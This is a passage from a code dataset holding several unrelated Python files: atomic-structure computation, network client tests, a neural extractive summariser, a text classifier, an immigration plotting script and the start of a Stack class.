ir >= 0:\n Print(ni)\n Print(n2)\n \nif opts.dry > 0:\n if ir >= 0 and opts.np > 1:\n FinalizeMPI()\n exit(0)\n \nif (opts.mm > 0):\n LimitArray(-1, opts.mm)\ntry: \n OptimizeRadial('g')\nexcept:\n exit(0)\nif ir >= 0 or opts.rc == '' or opts.ntr > 0:\n SetBoundary(max(nmax,opts.imax)+opts.odn, eps, 1e30)\n\n ReinitRadial(0)\n SetRadialGrid(opts.nrg, 1.1, -1e30, 0.0, 1.0)\n\n Print('opt config: %s %d'%(opts.oc, opts.om))\n SetPotentialMode(opts.om, 1e30, 0)\n try:\n if opts.oc == 'g':\n OptimizeRadial('g')\n elif opts.oc == 'gv':\n OptimizeRadial(gv)\n elif opts.oc == 'v3':\n OptimizeRadial(v3)\n elif opts.oc == 'v4':\n OptimizeRadial(v4)\n elif opts.oc == 'gv3':\n OptimizeRadial(gv+v3)\n elif opts.oc == 'gi':\n OptimizeRadial(gi)\n elif opts.oc == 'gvi':\n OptimizeRadial(gv+gi)\n elif opts.oc == 'ic' and opts.ic != '':\n OptimizeRadial(opts.ic)\n except:\n exit(0)\n \n SetBoundary(max(nmax,opts.imax)+opts.odn, eps, 1e30)\nGetPotential(p0+'a.pot')\n\nif opts.pseudo >= -2:\n Print('solve pseudo orbs')\n SolvePseudo(opts.kmax, nvm, 0, 0, opts.pseudo, opts.xdf)\n \nif opts.mcut > 0:\n SetMixCut(-1, opts.mcut)\n\nif opts.pj >= 0:\n Structure(opts.pj%2, opts.pj/2) \nelif opts.jmin >= 0 and opts.nj > 0:\n j0 = opts.jmin\n if opts.n%2 != j0%2:\n j0 += 1\n Structure(opts.pp, list(range(j0, j0+opts.nj*2, 2)))\n \nStructure(opts.hiter)\nStructure(-opts.piter-1, opts.ptol, opts.expdim, opts.expdimz)\n\nga = gc\nif opts.ic != '':\n ga0 = [opts.ic]\n gc = [opts.ic]\n for c in ga:\n if c != opts.ic:\n ga0.append(c)\n ga=ga0\n\nif opts.mcc > 1:\n ga = ga + ['cc1', 'cc2']\n if opts.rc == '':\n Config(3, 'cc1', gc, '2*1 3*1 4*1 5*1', 2, opts.mcc, 0, opts.kcc, 0, 0, opts.acc, 1)\n if opts.mcc2 > 1:\n Config(3, 'cc2', ga[len(gc):-1], '2*1 3*1 4*1 5*1', 2, opts.mcc2, 0, opts.kcc, 0, 0, -opts.acc2, gc)\n \nListConfig(p0+'a.cfg')\n\nif opts.ci > 0: \n Structure(p0+'b.en', p0+'b.ham', gc, ga[len(gc):], 1)\n BasisTable(p0+'a.bs')\n BasisTable(p0+'a', 10)\n MemENTable(p0+'b.en')\n PrintTable(p0+'b.en', p0+'a.en')\n TRTable(p0+'b.tr', gc[0:1], gc)\n PrintTable(p0+'b.tr', p0+'a.tr')\n exit(0)\n\nTransitionMBPT(opts.ntr, opts.ntr)\nif ir >= 0:\n StructureMBPT(opts.warn, opts.ignore)\n StructureMBPT(opts.rand, 0, opts.mcut0, opts.mcut1, opts.mcut2, opts.mcut3)\n mex = 0\n if (opts.pm == 2):\n mex = 6\n elif opts.nsp >= nn:\n mex = 1\n if opts.vmax != 0:\n StructureMBPT(abs(opts.vmax)*10+mex)\n else:\n StructureMBPT(mex)\n if opts.nk >= 0:\n StructureMBPT('1s', opts.nk)\n if opts.rh == '':\n StructureMBPT(p0+'b.en', [p0+'b.ham', p0+'b.ham0'],\n ga, opts.kmax, ni, n2, len(gc), ncp, ir)\n else:\n StructureMBPT(p0+'b.en', [p0+'b.ham', opts.rh],\n '', opts.kmax, ni, n2, len(gc), ncp, ir)\n if opts.bas:\n BasisTable(p0+'a.bs')\n BasisTable(p0+'a', 10)\n MemENTable(p0+'b.en')\n PrintTable(p0+'b.en', p0+'a.en')\nelse:\n if opts.pm == 0:\n nns = len(ns)-1\n else:\n nns = ncp\n h = [pref+'i%02db.ham'%x for x in range(nns)]\n mex = 1\n if (opts.pm == 2):\n mex += 5\n if opts.vmax != 0:\n StructureMBPT(abs(opts.vmax)*10+mex)\n else:\n StructureMBPT(mex)\n if (opts.ntr > 0):\n TransitionMBPT(p0+'b.tr', gc[0:1], gc)\n StructureMBPT(p0+'b.en', pref+'i00b.ham0', h, ga, len(gc))\n if opts.bas:\n BasisTable(p0+'a.bs')\n BasisTable(p0+'a', 10)\n MemENTable(p0+'b.en')\n PrintTable(p0+'b.en', p0+'a.en')\n if (opts.ntr > 0):\n PrintTable(p0+'b.tr', p0+'a.tr')\n if opts.itr > 0:\n TRTable(p0+'b.tr', gc, gc)\n PrintTable(p0+'b.tr', p0+'a.tr')\n if opts.ice > 0:\n CETable(p0+'b.ce', gv, gc)\n PrintTable(p0+'b.ce', p0+'a.ce')\n\nt1 = time()\nPrint('all done %d %10.3E'%(opts.nr,t1-t0))\nif opts.np > 1:\n FinalizeMPI()\nif opts.csf > 0:\n CloseSFAC()\n","sub_path":"dl.py","file_name":"dl.py","file_ext":"py","file_size_in_byte":14871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"477017979","text":"# Copyright (c) 2016 Uber Technologies, Inc.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\nfrom __future__ import absolute_import\n\nimport os\nimport json\nimport pytest\nimport tornado\n\nfrom tchannel.errors import NoAvailablePeerError\nfrom tchannel.tornado import TChannel\nfrom tchannel.tornado import hyperbahn\n\n\ndef test_new_client_establishes_peers():\n routers = ['127.0.0.1:2300' + str(i) for i in xrange(5)]\n\n # TChannel knows about one of the peers already.\n channel = TChannel('test', known_peers=['127.0.0.1:23002'])\n\n hyperbahn.advertise(\n channel,\n 'baz',\n routers,\n )\n\n for router in routers:\n assert channel.peers.lookup(router)\n\n\ndef test_new_client_establishes_peers_from_file():\n\n host_path = os.path.join(\n os.path.dirname(os.path.realpath(__file__)),\n '../data/hosts.json',\n )\n\n # TChannel knows about one of the peers already.\n channel = TChannel('test', known_peers=['127.0.0.1:23002'])\n\n hyperbahn.advertise(\n channel,\n 'baz',\n None,\n None,\n host_path\n )\n\n with open(host_path, 'r') as json_data:\n routers = json.load(json_data)\n for router in routers:\n assert channel.peers.lookup(router)\n\n\n@pytest.mark.gen_test\ndef test_advertise_should_raise_on_invalid_router_file():\n\n channel = TChannel(name='client')\n with pytest.raises(IOError):\n yield hyperbahn.advertise(\n channel,\n 'baz',\n None,\n None,\n '?~~lala')\n\n with pytest.raises(ValueError):\n yield hyperbahn.advertise(\n channel,\n 'baz',\n '?~~lala',\n None,\n '?~~lala')\n\n\n@pytest.mark.gen_test\ndef test_request():\n channel = TChannel(name='test')\n hyperbahn.advertise(channel, 'foo', ['127.0.0.1:23000'])\n\n # Just want to make sure all the plumbing fits together.\n\n with pytest.raises(NoAvailablePeerError):\n yield channel.request(service='bar').send(\n arg1='baz',\n arg2='bam',\n arg3='boo',\n headers={'as': 'qux'},\n )\n\n\n@pytest.mark.gen_test\ndef test_advertise():\n server = TChannel(name=\"test_server\")\n\n @server.register('ad', 'json')\n @tornado.gen.coroutine\n def ad(request, response):\n body = yield request.get_body()\n response.write_body(body)\n\n server.listen()\n channel = TChannel(name='test')\n\n response = yield hyperbahn.advertise(\n channel,\n 'test', [server.hostport]\n )\n result = yield response.get_body()\n assert (\n result == '{\"services\": [{\"serviceName\": \"test\", \"cost\": 0}]}' or\n result == '{\"services\": [{\"cost\": 0, \"serviceName\": \"test\"}]}'\n )\n","sub_path":"tests/tornado/test_hyperbahn.py","file_name":"test_hyperbahn.py","file_ext":"py","file_size_in_byte":3750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"478429159","text":"\nfrom allennlp.nn.util import sort_batch_by_length\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\"\"\"\nTODO:\n - Batching (30 sentences?)\n - New affines + character-level RNN to encode words.\n\n\"\"\"\n\n\nclass SummaRuNNer(nn.Module):\n\n def __init__(self, vocab_size, embedding_size, hidden_size, batch_size,\n position_size=1000, position_embedding_size=100,\n layers=1, dropout=0.5):\n\n \"\"\"\n SummaRuNNer: A neural-based sentence classifier for Extractive Summarization.\n\n Parameters:\n -----------\n :param vocab_size: int\n The embedding size for embedding input words (space in which\n words are projected).\n\n :param embedding_size: int\n The embedding size for embedding input words (space in which\n words are projected).\n\n :param hidden_size: int\n The hidden size of the bi-directional GRU.\n\n :param position_size: int\n The length of the longest document in sentences.\n\n :param position_embedding_size: int\n The embedding size for absolute and relative position embeddings.\n \"\"\"\n # Save the construction arguments, useful for serialization\n self.init_arguments = locals()\n self.init_arguments.pop(\"self\")\n self.init_arguments.pop(\"__class__\")\n super(SummaRuNNer, self).__init__()\n\n self.vocab_size = vocab_size\n self.hidden_size = hidden_size\n self.embedding_size = embedding_size\n self.batch_size = batch_size\n self.layers = layers\n self.position_embedding_size = position_embedding_size\n self.position_size = position_size\n\n # Activations\n self.tanh = nn.Tanh()\n\n # Learned word embeddings (vocab_size x embedding_size)\n self.embedding = nn.Embedding(vocab_size, embedding_size)\n\n # Positional embeddings\n self.abs_pos_embedding = nn.Embedding(position_size,\n position_embedding_size)\n self.rel_pos_embedding = nn.Embedding(position_size,\n position_embedding_size)\n\n # SummaRuNNer coherence affine transformations.\n self.content = nn.Linear(hidden_size * 2, 1, bias=False)\n self.salience = nn.Bilinear(hidden_size * 2, hidden_size * 2, 1,\n bias=False)\n self.novelty = nn.Bilinear(hidden_size * 2, hidden_size * 2, 1,\n bias=False)\n self.abs_pos = nn.Linear(position_embedding_size, 1, bias=False)\n self.rel_pos = nn.Linear(position_embedding_size, 1, bias=False)\n\n self.word_rnn = nn.GRU(\n input_size=embedding_size,\n hidden_size=hidden_size,\n num_layers=layers,\n dropout=dropout,\n batch_first=True,\n bidirectional=True\n )\n\n self.sentence_rnn = nn.GRU(\n input_size=hidden_size * 2,\n hidden_size=hidden_size,\n num_layers=layers,\n dropout=dropout,\n batch_first=True, bidirectional=True\n )\n\n # Encoders and Decoders\n self.decoder = nn.Linear(hidden_size, vocab_size)\n self.encode_document = nn.Linear(hidden_size * 2, hidden_size * 2)\n\n def init_hidden(self):\n \"\"\"\n Produce a new, initialized hidden state variable where all values\n are zero.\n :return: A torch Tensor.\n \"\"\"\n\n weight = next(self.parameters()).data\n return Variable(weight.new(self.layers, self.batch_size,\n self.hidden_size).zero_())\n\n def document_representation(self, document_tensor):\n \"\"\"\n Compute the sentence representation, D.\n :param document_tensor:\n Stacked tensors of the sentences given throughout the document.\n Assumes document_tensor is wrapped with Variable.\n :return: D: The average pooled representation of the document.\n \"\"\"\n\n # 1. Pad variable lengths sentences to prevent the model from learning\n # from the padding.\n\n # Collect lengths for sorting and padding.\n # Shape: (batch_size,)\n document_mask = (document_tensor != 0)\n sentence_lengths = Variable(document_mask.sum(dim=1))\n\n # Shape: (batch_size x max sentence length x embedding size)\n embedded_sentences = self.embedding(Variable(document_tensor))\n sorted_embeddings, sorted_lengths, restore_index, permute_index \\\n = sort_batch_by_length(embedded_sentences, sentence_lengths)\n\n sorted_lengths = list(sorted_lengths.data.long())\n\n packed_sentences = nn.utils.rnn.pack_padded_sequence(sorted_embeddings,\n sorted_lengths,\n batch_first=True)\n\n # 2. Encode the sentences at the word level.\n # Shape: (batch_size x max sentence length x bidirectional hidden)\n # (batch_size x bidirectional hidden)\n sentences_out, sentences_hidden = self.word_rnn(packed_sentences)\n\n padded_sentences, padded_sentences_lengths = \\\n nn.utils.rnn.pad_packed_sequence(sentences_out, batch_first=True)\n\n # Restore order for predictions.\n encoded_sentences_restored = padded_sentences[restore_index]\n\n # 3. Pool along the length dimension.\n sentence_representations = torch.mean(encoded_sentences_restored, 1)\n\n # 4. Encode the document at the sentence level.\n doc_out, doc_hiddens = self.sentence_rnn(sentence_representations.unsqueeze(0))\n\n # 4. Average the sentence representations and push through affine.\n pooled_doc_out = torch.mean(doc_out.squeeze(), 0)\n doc_rep = self.encode_document(pooled_doc_out)\n\n return sentence_representations, doc_rep\n\n def forward(self, sentence_hidden_states, index, running_summary,\n document_lengths, document_representations):\n \"\"\"\n Given a sentence at index 'index' for a given document,\n predicts whether the sentence should be included in the\n current running summary.\n :param sentence_hidden_states: torch.FloatTensor\n An encoded sentence to classify.\n :param index: int\n The place in which it occurs in the document.\n :param running_summary: torch.FloatTensor\n The current running summary representation.\n :param doc_len: int\n The length of the document in sentences.\n :param document_representations: torch.FloatTensor\n The average pooling of all sentences in the document.\n :return: The probability of this sentence being included in a summary.\n \"\"\"\n # Forward pass through the bidirectional GRU.\n # Pass through Bidirectional word-level RNN with batch size 1.\n # By taking the number of sentences rather than the batch size, allows\n # remainders to be included in the calculation.\n abs_index = torch.LongTensor([index] * sentence_hidden_states.size(0))\n\n # Quantize each document into 10 segments.\n rel_index = ((abs_index.float() / document_lengths.float()) * 10).long()\n\n # Embed the positions.\n absolute_pos_embedding = self.abs_pos_embedding(Variable(abs_index))\n relative_pos_embedding = self.rel_pos_embedding(Variable(rel_index))\n\n # Classify the sentence.\n content = self.content(sentence_hidden_states)\n\n # Salience = h_t^T x W_salience x D\n salience = self.salience(sentence_hidden_states, document_representations)\n\n # Novelty = h_j^T x W_novelty * Tanh(s_j)\n novelty = self.novelty(sentence_hidden_states, self.tanh(running_summary))\n\n absolute_position_importance = self.abs_pos(absolute_pos_embedding)\n relative_position_importance = self.rel_pos(relative_pos_embedding)\n\n probabilities = F.sigmoid(content\n + salience\n - novelty # Punish for repeating words.\n + absolute_position_importance\n + relative_position_importance)\n\n return probabilities\n","sub_path":"machine_dictionary_rc/models/SummaRuNNer.py","file_name":"SummaRuNNer.py","file_ext":"py","file_size_in_byte":8601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"588040295","text":"import sys\nimport os\n# import libraries\nimport re\nimport numpy as np\nimport pandas as pd\nfrom sqlalchemy import create_engine\nfrom scipy.stats.mstats import gmean\nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem import WordNetLemmatizer\n#from nltk.corpus import stopwords\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import GridSearchCV, RandomizedSearchCV\nfrom sklearn.pipeline import Pipeline, FeatureUnion\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier, AdaBoostClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.linear_model import LogisticRegression, SGDClassifier\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import make_scorer\nfrom sklearn.multioutput import MultiOutputClassifier\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\nfrom sklearn.metrics import confusion_matrix, accuracy_score, f1_score, precision_score, recall_score, fbeta_score\nfrom sklearn.metrics import classification_report\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.externals import joblib\nimport nltk\nnltk.download(['punkt', 'wordnet','stopwords'])\n## define some custom stopwords\n#full stopwords from nltk\nstopwords_a= ['i', 'me', 'my', 'myself', 'we', 'our', 'ours', 'ourselves', 'you',\n \"you're\", \"you've\", \"you'll\", \"you'd\", 'your', 'yours', 'yourself',\n 'yourselves', 'he', 'him', 'his', 'himself', 'she', \"she's\", 'her',\n 'hers', 'herself', 'it', \"it's\", 'its', 'itself', 'they', 'them',\n 'their', 'theirs', 'themselves', 'what', 'which', 'who', 'whom', 'this',\n 'that', \"that'll\", 'these', 'those', 'am', 'is', 'are', 'was', 'were',\n 'be', 'been', 'being', 'have', 'has', 'had', 'having', 'do', 'does',\n 'did', 'doing', 'a', 'an', 'the', 'and', 'but', 'if', 'or', 'because',\n 'as', 'until', 'while', 'of', 'at', 'by', 'for', 'with', 'about',\n 'against', 'between', 'into', 'through', 'during', 'before', 'after',\n 'above', 'below', 'to', 'from', 'up', 'down', 'in', 'out', 'on', 'off',\n 'over', 'under', 'again', 'further', 'then', 'once', 'here', 'there',\n 'when', 'where', 'why', 'how', 'all', 'any', 'both', 'each', 'few',\n 'more', 'most', 'other', 'some', 'such', 'no', 'nor', 'not', 'only',\n 'own', 'same', 'so', 'than', 'too', 'very', 's', 't', 'can', 'will',\n 'just', 'don', \"don't\", 'should', \"should've\", 'now', 'd', 'll', 'm',\n 'o', 're', 've', 'y', 'ain', 'aren', \"aren't\", 'couldn', \"couldn't\",\n 'didn', \"didn't\", 'doesn', \"doesn't\", 'hadn', \"hadn't\", 'hasn', \"hasn't\",\n 'haven', \"haven't\", 'isn', \"isn't\", 'ma', 'mightn', \"mightn't\", 'mustn',\n \"mustn't\", 'needn', \"needn't\", 'shan', \"shan't\", 'shouldn', \"shouldn't\",\n 'wasn', \"wasn't\", 'weren', \"weren't\", 'won', \"won't\", 'wouldn', \"wouldn't\"]\n\n#customized stopwords from nltk, verbs leftout\nstopwords_b= ['i', 'me', 'my', 'myself', 'we', 'our', 'ours', 'ourselves', 'you',\n \"you're\", \"you've\", \"you'll\", \"you'd\", 'your', 'yours', 'yourself',\n 'yourselves', 'he', 'him', 'his', 'himself', 'she', \"she's\", 'her',\n 'hers', 'herself', 'it', \"it's\", 'its', 'itself', 'they', 'them',\n 'their', 'theirs', 'themselves', 'what', 'which', 'who', 'whom', 'this',\n 'that', \"that'll\", 'these', 'those', 'am', 'is', 'are', 'was', 'were',\n 'a', 'an', 'the', 'and', 'but', 'if', 'or', 'because',\n 'as', 'until', 'while', 'of', 'at', 'by', 'for', 'with', 'about',\n 'against', 'between', 'into', 'through', 'during', 'before', 'after',\n 'above', 'below', 'to', 'from', 'up', 'down', 'in', 'out', 'on', 'off',\n 'over', 'under', 'again', 'further', 'then', 'once', 'here', 'there',\n 'when', 'where', 'why', 'how', 'all', 'any', 'both', 'each', 'few',\n 'more', 'most', 'other', 'some', 'such', 'no', 'nor', 'not', 'only',\n 'own', 'same', 'so', 'than', 'too', 'very', 's', 't', 'can', 'will',\n 'just','now', 'd', 'll', 'm',\n 'o', ]\n\n#customized stopwords from nltk, questwords and \"in\" , \"between\", etc. left out\nstopwords_c= ['i', 'me', 'my', 'myself', 'we', 'our', 'ours', 'ourselves', 'you',\n \"you're\", \"you've\", \"you'll\", \"you'd\", 'your', 'yours', 'yourself',\n 'yourselves', 'he', 'him', 'his', 'himself', 'she', \"she's\", 'her',\n 'hers', 'herself', 'it', \"it's\", 'its', 'itself', 'they', 'them',\n 'their', 'theirs', 'themselves', 'what', 'which', 'who', 'whom', 'this',\n 'that', \"that'll\", 'these', 'those', 'am', 'is', 'are', 'was', 'were',\n 'be', 'been', 'being', 'have', 'has', 'had', 'having', 'do', 'does',\n 'did', 'doing', 'a', 'an', 'the', 'and', 'but', 'if', 'or', 'because',\n 'as', 'until', 'while', 'of', 'at', 'by', 'for', 'then', 'once', 'there',\n 'all', 'any', 'both', 'each', 'few',\n 'more', 'most', 'other', 'some', 'such', 'no', 'nor', 'not', 'only',\n 'own', 'same', 'so', 'than', 'too', 'very', 's', 't', 'can', 'will',\n 'just', 'don', \"don't\", 'should', \"should've\", 'now', 'd', 'll', 'm',\n 'o', 're', 've', 'y', 'ain', 'aren', \"aren't\", 'couldn', \"couldn't\",\n 'didn', \"didn't\", 'doesn', \"doesn't\", 'hadn', \"hadn't\", 'hasn', \"hasn't\",\n 'haven', \"haven't\", 'isn', \"isn't\", 'ma', 'mightn', \"mightn't\", 'mustn',\n \"mustn't\", 'needn', \"needn't\", 'shan', \"shan't\", 'shouldn', \"shouldn't\",\n 'wasn', \"wasn't\", 'weren', \"weren't\", 'won', \"won't\", 'wouldn', \"wouldn't\"]\n\n\n#customized stopwords only pronouns & articles, sentence combiner\nstopwords_d= ['i', 'me', 'my', 'myself', 'we', 'our', 'ours', 'ourselves', 'you',\n \"you're\", \"you've\", \"you'll\", \"you'd\", 'your', 'yours', 'yourself',\n 'yourselves', 'he', 'him', 'his', 'himself', 'she', \"she's\", 'her',\n 'hers', 'herself', 'it', \"it's\", 'its', 'itself', 'they', 'them',\n 'their', 'theirs', 'themselves',\n 'this', 'that', \"that'll\", 'these', 'those','a', 'an', 'the', 'and',\n 'but', 'if', 'or', 'because', 'as', 'until', 'while', 'of', 'at',\n 'by', 'for', 'with', 'about', 'against']\n\n\ndef load_data(database_filepath):\n '''\n loads data from sql-database\n database_filepath: path to sqlite database\n returns X (message text), Y(multiple binarized categories), list of category names\n '''\n engine = create_engine('sqlite:///data/DisasterResponse.db')\n df = pd.read_sql('SELECT * FROM messages', con = engine)\n X = df['message']\n Y = df.drop(['genre', 'id', 'original', 'message'], axis=1)\n category_names = Y.columns.tolist()\n return X, Y, category_names\n\ndef tokenize(text):\n '''\n simple tokenization: keep only chars and numbers, convert to lowercase, tokenize and lemmatize using nltk\n text: str that will be tokenized\n\n returns new_tokens (list of extracted tokens)\n '''\n\n #remove punctuation\n text = re.sub(r\"[^a-zA-Z0-9]\", \" \", text.lower())\n #get tokens\n tokens = word_tokenize(text)\n lemmatizer = WordNetLemmatizer()\n new_tokens = []\n for tok in tokens:\n new_tokens.append(lemmatizer.lemmatize(tok).strip())\n return new_tokens\n\nclass StartingVerbExtractor(BaseEstimator, TransformerMixin):\n '''\n extract information whether text starts with verb or verbal phrase\n can be used as estimator in sklearn (transform)\n returns:\n 0 or 1\n '''\n def starting_verb(self, text):\n sentence_list = nltk.sent_tokenize(text)\n for sentence in sentence_list:\n pos_tags = nltk.pos_tag(tokenize(sentence))\n try:\n first_word, first_tag = pos_tags[0]\n if first_tag in ['VB', 'VBP'] or first_word == 'RT':\n return 1\n except:\n return 0\n return 0\n\n def fit(self, x, y=None):\n return self\n\n def transform(self, X):\n X_tagged = pd.Series(X).apply(self.starting_verb)\n return pd.DataFrame(X_tagged)\n\n\ndef build_model():\n '''\n define pipeline and/or gridsearch object for feature extraction and trainig classifier\n returns pipeline or gridsearch object\n '''\n pipeline = Pipeline([\n ('features', FeatureUnion([\n ('tfidf_pipeline', Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer())\n ])),\n ('starting_verb', StartingVerbExtractor()),\n ])),\n ('clf', MultiOutputClassifier(SGDClassifier()))\n ])\n\n#parameters = {'features__tfidf_pipeline__vect__max_df': (0.6, 0.8, 1),\n# 'features__tfidf_pipeline__vect__ngram_range': ((1,1),(1, 2)),\n# 'features__tfidf_pipeline__vect__stop_words': (stopwords_a,stopwords_b),\n# 'features__tfidf_pipeline__vect__max_features': (None, 10000),\n# 'clf__estimator__max_iter': (50,),\n# 'clf__estimator__alpha': (0.00001,),\n# 'clf__estimator__penalty': ('elasticnet','l2')}\n\n parameters = {'features__tfidf_pipeline__vect__max_df': (0.6,),\n 'features__tfidf_pipeline__vect__ngram_range': ((1, 2),),\n 'features__tfidf_pipeline__vect__stop_words': (stopwords_a,),\n 'features__tfidf_pipeline__vect__max_features': (None,),\n 'clf__estimator__max_iter': (50,),\n 'clf__estimator__alpha': (0.00001,),\n 'clf__estimator__penalty': ('elasticnet',)}\n cv = GridSearchCV(pipeline, param_grid = parameters, cv=5, n_jobs=1,\n verbose = 2, scoring = make_scorer(roc_auc_score))\n\n return cv\n #return pipeline\n\ndef evaluate_model(model, X_test, Y_test, category_names):\n '''\n evaluate the model\n prints evaluation metrics\n '''\n def get_metrics (y_test, y_pred):\n '''\n runs a number of metrics on multioutput classifier results\n y_test: dataframe with true labels (binary)\n y_pred: numpy array with predicted labels (y_pred = XXXX.predict(X_test) from an sklearn estimator)\n\n returns: dataframe with accuracy, precision, f1, recall, tp, tn, fp, fn, roc_auc\n\n\n\n scores for each multioutput classifier\n '''\n accuracy, precision, recall, f1, support, tn, fp, fn, tp, roc_auc = [], [], [], [], [], [], [], [], [], []\n for i in range (len(y_pred[0,:])):\n try:\n accuracy.append(accuracy_score(y_test.iloc[:,i],y_pred[:,i]))\n except:\n accuracy.append(np.nan)\n try:\n precision.append(precision_score(y_test.iloc[:,i],y_pred[:,i]))\n except:\n precision.append(np.nan)\n f1.append(f1_score(y_test.iloc[:,i],y_pred[:,i]))\n recall.append(recall_score(y_test.iloc[:,i],y_pred[:,i]))\n confusion_mat = confusion_matrix(y_test.iloc[:,i],y_pred[:,i])\n #see https://scikit-learn.org/stable/modules/generated/sklearn.metrics.confusion_matrix.html\n tn_, fp_, fn_, tp_ = confusion_mat.ravel()\n tn.append(tn_)\n fp.append(fp_)\n fn.append(fn_)\n tp.append(tp_)\n roc_auc.append(roc_auc_score(y_test.iloc[:,i],y_pred[:,i]))\n metrics = pd.DataFrame({'cat':category_names,'accuracy':accuracy, 'precision':precision,\n 'f1':f1, 'recall':recall,'true_pos': tp, 'true_neg': tn, 'false_pos':fp,\n 'false_neg':fn, 'roc_auc':roc_auc})\n metrics.set_index(keys='cat', inplace=True)\n return metrics\n #print(f\"Accuracy: {accuracy}\")\n #print(f\"Precision: {precision}\")\n #print(f\"Recall: {recall}\")\n #print(f\"fscore: {fscore}\")\n #print(f\"support: {support}\")\n\n Y_pred_test=model.predict(X_test)\n test_metrics=get_metrics(Y_test,Y_pred_test)\n #we take the mean of all metrics, because we want all predictors to be good,\n #irrespective of their relative occurance. This is equivalent to macro-averaging of scores\n # for the binary multilabel case\n print(\"metrics for test set:\")\n print(test_metrics.mean())\n print(\"metrics for test set, each category\")\n print(test_metrics)\n return test_metrics\n\ndef save_model(model, metrics, model_filepath, metrics_filepath):\n '''\n save model and metrics to pkl file\n '''\n joblib.dump(model, model_filepath)\n joblib.dump(metrics, metrics_filepath)\n\ndef main():\n if len(sys.argv) == 3:\n database_filepath, model_path = sys.argv[1:]\n print('Loading data...\\n DATABASE: {}'.format(database_filepath))\n X, Y, category_names = load_data(database_filepath)\n X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2)\n\n print('Building model...')\n model = build_model()\n\n print('Training model...')\n model.fit(X_train, Y_train)\n\n print('Evaluating model...')\n metrics = evaluate_model(model, X_test, Y_test, category_names)\n\n metrics_filepath = os.path.join(model_path,'classifier_metrics.pkl')\n model_filepath = os.path.join(model_path,'classifier.pkl')\n\n print('Saving model...\\n MODEL: {}'.format(model_filepath))\n save_model(model, metrics, model_filepath, metrics_filepath)\n\n print('Trained model saved!')\n\n else:\n print('Please provide the filepath of the disaster messages database '\\\n 'as the first argument and the filepath of the pickle file to '\\\n 'save the model to as the second argument. \\n\\nExample: python '\\\n 'train_classifier.py ../data/DisasterResponse.db classifier.pkl')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"models/train_classifier.py","file_name":"train_classifier.py","file_ext":"py","file_size_in_byte":14013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"149682034","text":"import numpy as np\nimport pandas as pd\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\n\ndf_can = pd.read_excel('https://ibm.box.com/shared/static/lw190pt9zpy5bd1ptyg2aw15awomz9pu.xlsx',\n sheet_name='Canada by Citizenship',\n skiprows=range(20),\n skipfooter=2)\n\ndf_can.isnull().sum()\n\n#Cleaning the data set to remove a few unnecessary columns\ndf_can.drop(['Type','Coverage','AREA','REG','DEV','Type','Coverage'], axis=1, inplace=True)\n\n#Renaming the columns\ndf_can.rename(columns={'OdName':'Country', 'AreaName':'Continent', 'RegName':'Region'}, inplace=True)\n\ndf_can['Total'] = df_can.sum(axis=1) #Summing up the total immigrants by country\n\n#Making a list of years\ndf_can.columns = list(map(str, df_can.columns)) # converting the column names into strings\nyears = list(map(str, range(1980, 2014))) # declaring a new variable\n\ndf_can.set_index('Country', inplace=True) # setting the \"Country\" as the index.\n\n#Top 5 countries\ndf_can.sort_values(by='Total', ascending=False, axis=0, inplace=True)\ndf_can.to_csv('ModifiedData.csv') #Save dataframe\ndf_top5 = df_can.head(5)\ndf_top5 = df_top5[years].transpose() \ndf_top5.index = df_top5.index.map(int) # let's change the index values of df_top5 to type integer for plotting\ndf_top5.plot(kind='line', figsize=(14, 8)) # pass a tuple (x, y) size\n\nplt.title('Immigration Trend of Top 5 Countries')\nplt.ylabel('Number of Immigrants')\nplt.xlabel('Years')\nplt.show()\n\n","sub_path":"Immigration.py","file_name":"Immigration.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"571969362","text":"'''\r\nName: Darius Sandford Date Assigned: 03-26-2018\r\n\r\nCourse: 1384 Sec 01 Date Due: 04-02-2018\r\n\r\nFile Name: postfixNotation.py\r\n\r\nDescription: Create a Stack class as a fixed length stack that can hold a maximum of 10 values and a program that tests the Stack class.\r\n'''\r\nclass Stack:\r\n\r\n #Creates the constructor\r\n def __init__(self, data = 0, length = 0):\r\n self.__data = [None] * 10\r\n self.__length = 0\r\n #Destroys data\r\n def destroy(self):\r\n 